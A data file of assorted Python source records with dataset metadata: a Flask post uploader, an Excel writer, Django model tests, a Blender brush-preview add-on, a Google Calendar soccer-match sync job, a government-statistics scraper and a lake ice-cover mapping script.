+{"seq_id": "532628809", "text": "from flaskblog import app, bcrypt, db\nfrom flaskblog.models import Post # assumed location of the Post model, which was used below without any import\nimport json\n\nwith open('./posts.json') as f:\n    data = json.load(f)\nprint(type(data))\n\nfor item in data:\n    print(item)\n    print(type(item))\n# print(data)\n\n# snippet for adding posts\nfor js in data:\n    post = Post(title=js['title'], content=js['content'], user_id=js['user_id'])\n    db.session.add(post)\n\ndb.session.commit()\n\nimport os\nclear = lambda: os.system('cls')\nclear()\n\n", "sub_path": "db_upload.py", "file_name": "db_upload.py", "file_ext": "py", "file_size_in_byte": 408, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "flaskblog.db.session.add", "line_number": 16, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 16, "usage_type": "name"}, {"api_name": "flaskblog.db.session.commit", "line_number": 18, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 18, "usage_type": "name"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "308417780", "text": "import xlwt\nimport time\n\ndef timeCove(a):\n    timeArray = time.strptime(a, \"%Y%m%d\")\n    otherStyleTime = time.strftime(\"%Y-%m-%d\",timeArray)\n    return otherStyleTime\ndef set_style(name, height, bold=False):\n\n    style = xlwt.XFStyle() # initialise the style\n\n    font = xlwt.Font() # create a font for the style\n    font.name = name # 'Times New Roman'\n    font.bold = bold\n    font.color_index = 4\n    font.height = height\n\n    # borders= xlwt.Borders()\n    # borders.left= 6\n    # borders.right= 6\n    # borders.top= 6\n    # borders.bottom= 6\n\n    style.font = font\n    # style.borders = borders\n\n    return style\n\n\n# write the Excel file\ndef write_excel(db,filename):\n    f = xlwt.Workbook() # create the workbook\n    '''\n    create the first sheet:\n    sheet1\n    '''\n    sheet1 = f.add_sheet(u'sheet1', cell_overwrite_ok=True) # create the sheet\n    row0 = [u'收费员工号', u'日志日期', u'收入(元)'] # column headers: toll-collector ID, log date, income (yuan)\n    for i in range(0, len(row0)):\n        sheet1.write(0, i, row0[i], set_style('Times New Roman', 220, True))\n\n    for (i,j) in db.items():\n        sheet1.write(i+1, 0, int('017'+str(j[2])), set_style('Times New Roman', 220, True))\n        sheet1.write(i+1, 1, timeCove(j[0][0:8]), set_style('Times New Roman', 220, True))\n        sheet1.write(i+1, 2, int(j[1])/100, set_style('Times New Roman', 220, True))\n    f.save(filename[0:-4] + '.xls') # save the file; xlwt emits the legacy .xls format, so the extension should be .xls, not .xlsx\n\n\n", "sub_path": "123/creatXls.py", "file_name": "creatXls.py", "file_ext": "py", "file_size_in_byte": 1355, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.strptime", "line_number": 5, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 6, "usage_type": "call"}, {"api_name": "xlwt.XFStyle", "line_number": 10, "usage_type": "call"}, {"api_name": "xlwt.Font", "line_number": 12, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 32, "usage_type": "call"}]}
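write_excel above builds a fresh XFStyle for every single cell; xlwt copes, but the .xls format caps the number of distinct formatting records (commonly cited at around 4k), so the usual pattern is to build each style once and reuse the object. A sketch of that pattern using xlwt's easyxf helper (the sample sheet contents are made up):

import xlwt

# one style object per distinct look, created once and shared by all cells
HEADER_STYLE = xlwt.easyxf('font: name Times New Roman, bold on, height 220')
CELL_STYLE = xlwt.easyxf('font: name Times New Roman, height 220')

book = xlwt.Workbook()
sheet = book.add_sheet('sheet1', cell_overwrite_ok=True)
for col, title in enumerate(('id', 'date', 'income')):
    sheet.write(0, col, title, HEADER_STYLE)
for row, value in enumerate((1.5, 2.0, 3.25), start=1):
    sheet.write(row, 1, value, CELL_STYLE)
book.save('example.xls')   # xlwt writes .xls only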
+{"seq_id": "198939661", "text": "from datetime import timedelta\nfrom unittest import TestCase\nfrom tasks.models import Task\nfrom django.utils import timezone\n\n\nclass TaskModelTestCase(TestCase):\n\n    def test_complete_model_is_complete(self):\n        target = Task()\n        target.complete_time = timezone.now() - timezone.timedelta(days = 1)\n\n        self.assertTrue(target.is_complete)\n\n    def test_incomplete_model_is_incomplete(self):\n        target = Task()\n        target.complete_time = None\n\n        self.assertFalse(target.is_complete)\n\n    def test_future_complete_model_is_incomplete(self):\n        target = Task()\n        target.complete_time = timezone.now() + timezone.timedelta(days = 1)\n\n        self.assertFalse(target.is_complete)\n\n    def test_due_soon_model_is_due_soon(self):\n        target = Task()\n        target.due_date = timezone.now() + timedelta(days = 1)\n\n        self.assertTrue(target.due_soon)\n\n    def test_not_due_soon_model_is_not_due_soon(self):\n        target = Task()\n        target.due_date = timezone.now() + timezone.timedelta(days = 3)\n\n        self.assertFalse(target.due_soon)\n\n    def test_no_due_date_model_is_not_due_soon(self):\n        target = Task()\n        target.due_date = None\n\n        self.assertFalse(target.due_soon)\n\n    def test_mark_complete_marks_complete(self):\n        target = Task()\n        target.complete_time = None\n        self.assertFalse(target.is_complete)\n\n        target.mark_complete()\n\n        self.assertTrue(target.is_complete)\n\n    def test_mark_incomplete_marks_incomplete(self):\n        target = Task()\n\n        target.complete_time = timezone.now()\n        self.assertTrue(target.is_complete)\n\n        target.mark_incomplete()\n\n        self.assertFalse(target.is_complete)\n", "sub_path": "02/demos/todo/tasks/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tasks.models.Task", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 11, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 11, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 11, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 17, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 23, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 24, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 29, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 30, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 35, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 36, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 41, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 47, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 56, "usage_type": 
"call"}, {"api_name": "django.utils.timezone.now", "line_number": 58, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "37725209", "text": "import bpy\r\nfrom bpy.app.handlers import persistent\r\nfrom bpy.props import EnumProperty\r\n\r\npreview_collection = None\r\n\r\n\r\n@persistent\r\ndef brush_load_handler(none):\r\n global preview_collection\r\n\r\n unregister_and_unload_brushes()\r\n register_and_load_brushes()\r\n\r\n\r\n@persistent\r\ndef brush_update_handler(scene):\r\n global preview_collection\r\n\r\n try:\r\n if bpy.context.window_manager.brush_previews != bpy.context.tool_settings.sculpt.brush.name:\r\n bpy.context.window_manager.brush_previews = bpy.context.tool_settings.sculpt.brush.name\r\n except:\r\n pass\r\n\r\n if preview_collection:\r\n if not (set(brush.name for brush in bpy.data.brushes if brush.use_paint_sculpt) <= set(item[0] for item in preview_collection.items())):\r\n bpy.utils.previews.remove(preview_collection)\r\n add_brushes()\r\n bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef add_brushes():\r\n global preview_collection\r\n\r\n preview_collection = bpy.utils.previews.new()\r\n brushes = [brush for brush in bpy.data.brushes if brush.use_paint_sculpt]\r\n\r\n for brush in brushes:\r\n preview_collection.new(brush.name)\r\n\r\n\r\ndef brush_enum_items():\r\n global preview_collection\r\n\r\n enum_items = []\r\n\r\n for name, preview in preview_collection.items():\r\n enum_items.append((name, name, name, \"BRUSH_{}\".format(bpy.data.brushes[name].sculpt_tool if bpy.data.brushes[name].sculpt_tool != \"DRAW\" else \"SCULPT_DRAW\"), preview.icon_id))\r\n\r\n return enum_items\r\n\r\n\r\ndef brush_changed(self, context):\r\n wm = context.window_manager\r\n context.tool_settings.sculpt.brush = bpy.data.brushes[wm.brush_previews]\r\n\r\n\r\ndef register_and_load_brushes():\r\n global preview_collection\r\n\r\n add_brushes()\r\n\r\n bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef unregister_and_unload_brushes():\r\n global preview_collection\r\n\r\n if preview_collection:\r\n bpy.utils.previews.remove(preview_collection)\r\n preview_collection = None\r\n", "sub_path": "All_In_One/addons/HOps/brush_previews.py", "file_name": "brush_previews.py", "file_ext": "py", "file_size_in_byte": 2122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bpy.app.handlers.persistent", "line_number": 8, "usage_type": "name"}, {"api_name": "bpy.context", "line_number": 21, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 22, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 27, "usage_type": "attribute"}, {"api_name": "bpy.utils.previews.remove", "line_number": 28, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 28, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 30, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 30, "usage_type": "call"}, {"api_name": "bpy.app.handlers.persistent", "line_number": 16, "usage_type": "name"}, {"api_name": "bpy.utils.previews.new", "line_number": 36, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 36, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 49, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 56, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 64, "usage_type": "attribute"}, {"api_name": 
"bpy.props.EnumProperty", "line_number": 64, "usage_type": "call"}, {"api_name": "bpy.utils.previews.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 71, "usage_type": "attribute"}]}
+{"seq_id": "166268229", "text": "import datetime\nimport logging\nimport os\nimport pathlib\nimport pymongo\n\nfrom soccer.gcal.gcal import get_calendar_service, create_event, delete_event, get_past_events_id_list\nfrom soccer.pipelines import SoccerMongoDBPipeline\nfrom soccer.utils import get_end_time, datetime_object_to_str\n\n\nclass AllTeamsCalendarJob(object):\n APPLICATION_NAME_TUPLE = ('US National Teams Google Calendar', 'all-teams')\n APPLICATION_SCOPE = 'all'\n CALENDAR_ID = 'kpdvbqkv4bo726acao7v7v57io@group.calendar.google.com'\n\n def __init__(self):\n self.db = SoccerMongoDBPipeline()\n self.service = get_calendar_service(self.APPLICATION_NAME_TUPLE, self.APPLICATION_SCOPE)\n self.logger = logging.getLogger('AllTeamsCalendarJob')\n\n def run(self):\n self.delete_past_events()\n self.create_or_update_events()\n self.delete_old_html_and_json()\n\n def delete_past_events(self):\n for event_id in get_past_events_id_list(self.service, self.CALENDAR_ID):\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def delete_replaced_events(self):\n replaced_events_gcal_id_list = set([x['gcal_id'] for x in self.db.collection.find({'status': 'replaced'})])\n for event_id in replaced_events_gcal_id_list:\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def create_event_body(self, match):\n watch_list = match['watch_list'] if match['watch_list'] else []\n watch_url_list = match['watch_url_list'] if match['watch_url_list'] else []\n details_to_join = filter(None, [match['match_detail_url'],\n 'Watch:',\n ', '.join(watch_list),\n ', '.join(watch_url_list),\n 'Tickets:', match['ticket_info_url'],\n match['buy_tickets_url']])\n\n details = '\\n'.join(details_to_join)\n start_datetime = datetime_object_to_str(match['date_and_time'], '%Y-%m-%dT%H:%M:%S')\n # Google api doesn't accept 'Utc/Zulu'. Use Iceland's time which is Zulu time.\n event = {'summary': match['home_team'] + ' vs ' + match['opposing_team'],\n 'location': match['venue'],\n 'description': details,\n 'start': {'dateTime': start_datetime + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'end': {'dateTime': get_end_time(start_datetime, date_format='%Y-%m-%dT%H:%M:%S') + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'reminders': {'useDefault': True}\n }\n return event\n\n def create_or_update_events(self):\n all_matches = self.db.collection.find({\"status\": {\"$ne\": \"replaced\"}, \"date_and_time\": {\"$gte\": datetime.datetime.today()}})\n for match in all_matches:\n event_body = self.create_event_body(match)\n\n # If match has gcal_id, the event has already been created\n event_exists = dict(match).get('gcal_id')\n if event_exists:\n # Going with always update, seems easiest. 
No need to convert times etc\n # Not necessary now, but in the future, might want to check modified time on db and only update if\n # it's recent\n updated = self.service.events().update(calendarId=self.CALENDAR_ID,\n eventId=match['gcal_id'],\n body=event_body).execute()\n self.logger.info(\"{} updated\".format(updated['summary']))\n\n # if event doesnt exist, create one\n else:\n created = create_event(self.service, self.CALENDAR_ID, event_body)\n if created['status'] == 'confirmed':\n gcal_id = created['id']\n modified = datetime.datetime.utcnow()\n self.db.collection.find_one_and_update({'match_detail_url': match['match_detail_url']},\n {'$set': {'gcal_id': gcal_id, 'modified': modified}})\n self.logger.info(\"{} created and event_id saved.\".format(created['summary']))\n\n def clean_up_duplicate_events(self, delete_url_changes=True):\n # This might be something that is caused by derps in the script being run manually?\n event_id_set = set([x['id'] for x in self.service.events().list(calendarId=self.CALENDAR_ID).execute()['items']])\n cursor = self.db.collection.find()\n gcal_id_set = set(filter(None, [x.get('gcal_id') for x in cursor]))\n to_delete = event_id_set - gcal_id_set\n for event_id in to_delete:\n delete_event(self.service, self.CALENDAR_ID, event_id)\n if delete_url_changes:\n self.clean_up_duplicate_from_url_changes()\n\n def clean_up_duplicate_from_url_changes(self):\n # Sometimes the same match has their url changed after being posted.\n # This causes a problem because that url is used as unique key in the db.\n # We could use home_team-opp_team-date as unique key but this would create problem for past events since their date would be null\n # So, I will keep the duplicates in the db but clean them up here before being posted to gcal\n # just want to be safe and include one extra day\n collection = self.db.collection\n for match in self.db.collection.aggregate(\n [{'$group':\n {'_id': {'home': '$home_team', 'opp': '$opposing_team'},\n 'count': {'$sum': 1}}\n }]):\n if match['count'] > 1:\n home_team, opp_team = match['_id']['home'], match['_id']['opp']\n pivot = collection.find({'home_team': home_team, 'opposing_team': opp_team}).sort('created', pymongo.DESCENDING)[0]\n if not pivot['date_and_time']:\n # skip past events\n continue\n start = pivot['date_and_time'] - datetime.timedelta(days=1)\n end = pivot['date_and_time'] + datetime.timedelta(days=1)\n # get all having same home team n opp team.\n # If the dates are fairly close (within 24 hours), then get the last created n set the rest to have status = \"replaced\"\n collection.update({'home_team': home_team, 'opposing_team': opp_team,\n 'gcal_id': {'$ne': pivot['gcal_id']},\n 'date_and_time': {'$gte': start, '$lte': end}},\n {'$set': {'status': 'replaced'}}, multi=True)\n\n def delete_old_html_and_json(self):\n repo_dir = pathlib.Path(__file__).parents[2].__str__()\n html_dir = os.path.join(repo_dir, 'html_files')\n json_dir = os.path.join(repo_dir, 'items')\n last_month = datetime.datetime.today() - datetime.timedelta(days=30)\n for _, _, filelist in os.walk(html_dir):\n for f in filelist:\n fdate_string = f.split('_')[0]\n try:\n fdate = datetime.datetime.strptime(fdate_string, '%Y%m%d')\n except ValueError:\n continue\n if fdate < last_month:\n html_file = os.path.join(html_dir, f)\n json_file = os.path.join(json_dir, f.rsplit('_', 1)[0] + '.json')\n for x in (html_file, json_file):\n self._delete_file(x)\n\n def _delete_file(self, fpath):\n if os.path.isfile(fpath):\n os.remove(fpath)\n\n\nif __name__ == 
'__main__':\n AllTeamsCalendarJob().run()\n AllTeamsCalendarJob().clean_up_duplicate_events()\n # AllTeamsCalendarJob().delete_replaced_events()\n", "sub_path": "soccer/gcal/all_teams.py", "file_name": "all_teams.py", "file_ext": "py", "file_size_in_byte": 7881, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "soccer.pipelines.SoccerMongoDBPipeline", "line_number": 18, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_calendar_service", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_past_events_id_list", "line_number": 28, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 29, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 34, "usage_type": "call"}, {"api_name": "soccer.utils.datetime_object_to_str", "line_number": 47, "usage_type": "call"}, {"api_name": "soccer.utils.get_end_time", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.create_event", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 93, "usage_type": "call"}, {"api_name": "pymongo.DESCENDING", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 116, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 128, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 128, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 128, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 133, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 144, "usage_type": "call"}]}
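create_event_body in the record above hand-assembles the RFC 3339 timestamps the Calendar API expects, pinning the zone to Atlantic/Reykjavik as a zero-offset stand-in for UTC. A small helper showing the same start/end construction in isolation; the two-hour duration is an arbitrary placeholder, since the actual length produced by get_end_time is not visible here:

from datetime import datetime, timedelta

def event_times(start, duration=timedelta(hours=2)):
    # Build the 'start'/'end' dicts for a Calendar API event body.
    fmt = '%Y-%m-%dT%H:%M:%S-00:00'   # RFC 3339 with an explicit zero UTC offset
    zone = 'Atlantic/Reykjavik'       # zero-offset zone, as in the job above
    return (
        {'dateTime': start.strftime(fmt), 'timeZone': zone},
        {'dateTime': (start + duration).strftime(fmt), 'timeZone': zone},
    )

start, end = event_times(datetime(2020, 3, 1, 19, 30))
print(start)
print(end)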
+{"seq_id": "580906518", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.request\nimport time\nimport csv\n\n\ndef get_request_years():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n page = requests.get(\"http://www.stats.gov.cn/tjsj/ndsj/\", headers = headers)\n\n html = BeautifulSoup(page.content, 'html.parser')\n table = html.find('table', 'ztzw_tab')\n print(table)\n links = table.findAll('a')\n years_hrefs = []\n for link in links:\n years_hrefs.append(link['href'])\n\n print(years_hrefs)\n return years_hrefs\n\n\n\n\ndef get_data_for_year(year):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n left_link = re.sub('indexch', 'left', year)\n base_link = re.sub('indexch.htm', '', year)\n base_year = re.findall('\\d+', base_link)[0]\n year_page = requests.get(left_link, headers=headers)\n year_html = BeautifulSoup(year_page.content)\n if len(year_html.findAll('ul', {'id': 'foldinglist'})) != 0:\n folding_lists = year_html.findAll('ul', {'id': 'foldinglist'})\n else:\n folding_lists = year_html.findAll('ul', {'id': re.compile('divOne_*')})\n\n\n for folding_list in folding_lists:\n li_lists = folding_list.findAll('li')\n\n for li_list in li_lists:\n file = li_list.find(\"a\").get('href')\n name = li_list.find(\"a\").text.strip()\n name = re.sub('\\W+', '', name)\n print(file)\n\n if '.jpg' in file:\n retries = 3\n success = False\n while not success and retries >= 0:\n if retries == 0:\n raise Exception(\"cause of the problem, time out\")\n\n try:\n urllib.request.urlretrieve(base_link + file,\n 'C:\\\\Users\\\\jocel\\\\OneDrive\\\\Desktop\\\\test\\\\' + base_year + name + '.jpg')\n success = True\n except Exception as e:\n wait = retries * 30\n time.sleep(wait)\n retries -= 1\n print(e)\n elif '简要说明' in name:\n pass\n elif '主要统计指标解释' in name:\n pass\n elif '.htm' in file:\n retries = 3\n success = False\n while not success and retries >= 0:\n if retries == 0:\n raise Exception(\"cause of the problem, time out\")\n\n try:\n print(file)\n print(base_link)\n add = re.sub(r'\\b.htm\\b', '.xls', base_link + file)\n print(add)\n urllib.request.urlretrieve(add,\n 'C:\\\\Users\\\\jocel\\\\OneDrive\\\\Desktop\\\\test\\\\' + base_year + name + '.xls')\n\n success = True\n except Exception as e:\n wait = retries * 30\n time.sleep(wait)\n retries -= 1\n print(e)\n\n\n else:\n raise Exception(\"cause of the problem\")\n\ndef flow():\n years_hrefs = get_request_years()\n for year_href in years_hrefs:\n print(year_href)\n get_data_for_year(year_href)\n\n\n\nif __name__== \"__main__\":\n flow()\n", "sub_path": "get_stat_data.py", "file_name": "get_stat_data.py", "file_ext": "py", "file_size_in_byte": 3595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, 
{"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 59, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 59, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 59, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 83, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 83, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}]}
+{"seq_id": "322139505", "text": "import fiona\nimport numpy as np\nimport pandas as pd \nimport geopandas as gpd\nimport shapely\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport descartes\nfrom sklearn.linear_model import LogisticRegression\nimport geoplot as gplt\nimport geoplot.crs as gcrs\nimport joblib\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.feature_selection import RFE\nimport statsmodels.api as sm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.impute import SimpleImputer\n\nRES_CONST = 0.25\npd.set_option('display.max_columns', None)\n\n\ninfile1 =\"https://pasta.lternet.edu/package/data/eml/edi/267/2/1c716f66bf3572a37a9f67035f9e02ac\".strip() \ninfile1 = infile1.replace(\"https://\",\"http://\")\n \ndt1 =pd.read_csv(infile1 \n ,skiprows=1\n ,sep=\",\" \n ,quotechar='\"' \n , names=[\n \"lakecode\", \n \"lakename\", \n \"continent\", \n \"country\", \n \"state\", \n \"IntermittentIceCover\", \n \"Latitude_dd\", \n \"Longitude_dd\", \n \"Elevation_m\", \n \"MeanAnnualAirTemp_c\", \n \"SurfaceArea_km2\", \n \"MeanDepth_m\", \n \"MaximumDepth_m\", \n \"Volume_mcm\", \n \"WatershedArea_km2\", \n \"ShorelineLength_km\", \n \"ResidenceTime_days\", \n \"MeanDischarge_m3_sec\", \n \"Slope_degrees\", \n \"ShorelineDevelopment\", \n \"JFMCloudCover_perc\", \n \"JFMPrecipitation_mm\", \n \"DistanceToCoast_km\", \n \"MaximumDistanceToLand_km\" ]\n )\n# Coerce the data into the types specified in the metadata \ndt1.lakecode=dt1.lakecode.astype('category') \ndt1.lakename=dt1.lakename.astype('category') \ndt1.continent=dt1.continent.astype('category') \ndt1.country=dt1.country.astype('category') \ndt1.state=dt1.state.astype('category') \ndt1.IntermittentIceCover=dt1.IntermittentIceCover.astype('category') \ndt1.Latitude_dd=pd.to_numeric(dt1.Latitude_dd,errors='coerce') \ndt1.Longitude_dd=pd.to_numeric(dt1.Longitude_dd,errors='coerce') \ndt1.Elevation_m=pd.to_numeric(dt1.Elevation_m,errors='coerce') \ndt1.MeanAnnualAirTemp_c=pd.to_numeric(dt1.MeanAnnualAirTemp_c,errors='coerce') \ndt1.SurfaceArea_km2=pd.to_numeric(dt1.SurfaceArea_km2,errors='coerce') \ndt1.MeanDepth_m=pd.to_numeric(dt1.MeanDepth_m,errors='coerce') \ndt1.MaximumDepth_m=pd.to_numeric(dt1.MaximumDepth_m,errors='coerce') \ndt1.Volume_mcm=pd.to_numeric(dt1.Volume_mcm,errors='coerce') \ndt1.WatershedArea_km2=pd.to_numeric(dt1.WatershedArea_km2,errors='coerce') \ndt1.ShorelineLength_km=pd.to_numeric(dt1.ShorelineLength_km,errors='coerce') \ndt1.ResidenceTime_days=pd.to_numeric(dt1.ResidenceTime_days,errors='coerce') \ndt1.MeanDischarge_m3_sec=pd.to_numeric(dt1.MeanDischarge_m3_sec,errors='coerce') \ndt1.Slope_degrees=pd.to_numeric(dt1.Slope_degrees,errors='coerce') \ndt1.ShorelineDevelopment=pd.to_numeric(dt1.ShorelineDevelopment,errors='coerce') \ndt1.JFMCloudCover_perc=pd.to_numeric(dt1.JFMCloudCover_perc,errors='coerce') \ndt1.JFMPrecipitation_mm=pd.to_numeric(dt1.JFMPrecipitation_mm,errors='coerce') \ndt1.DistanceToCoast_km=pd.to_numeric(dt1.DistanceToCoast_km,errors='coerce') \ndt1.MaximumDistanceToLand_km=pd.to_numeric(dt1.MaximumDistanceToLand_km,errors='coerce') \n\ndt = dt1.filter(['Latitude_dd', 'Longitude_dd', 'IntermittentIceCover'])\ndt['IntermittentIceCover'] = dt['IntermittentIceCover'].map({'Y': 1, 'N': 0})\n\ndt = 
gpd.GeoDataFrame(dt, geometry = gpd.points_from_xy(dt.Longitude_dd, dt.Latitude_dd))\n\nannualLakes= dt[dt['IntermittentIceCover']==0]\nprint(annualLakes.shape)\nintermittentLakes= dt[dt['IntermittentIceCover']==1]\nprint(intermittentLakes.shape)\n\nworld = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres'))\n\nax = gplt.polyplot(world, projection=gplt.crs.NorthPolarStereo(), facecolor='whitesmoke', figsize = (15, 15))\n\ngplt.pointplot(annualLakes, color = 'black', ax = ax, s = 10, label = 'Annual winter ice')\ngplt.pointplot(intermittentLakes, color = 'tab:orange', ax = ax, s = 10, label = 'Intermittent winter ice')\nlgnd = plt.legend(loc=\"lower left\", scatterpoints=1, fontsize=18)\nlgnd.legendHandles[0]._sizes = [100]\nlgnd.legendHandles[1]._sizes = [100]\nplt.savefig('trainingLakeMap.png', bbox_inches='tight')\nplt.clf()\n", "sub_path": "trainingMap.py", "file_name": "trainingMap.py", "file_ext": "py", "file_size_in_byte": 4823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.set_option", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.to_numeric", 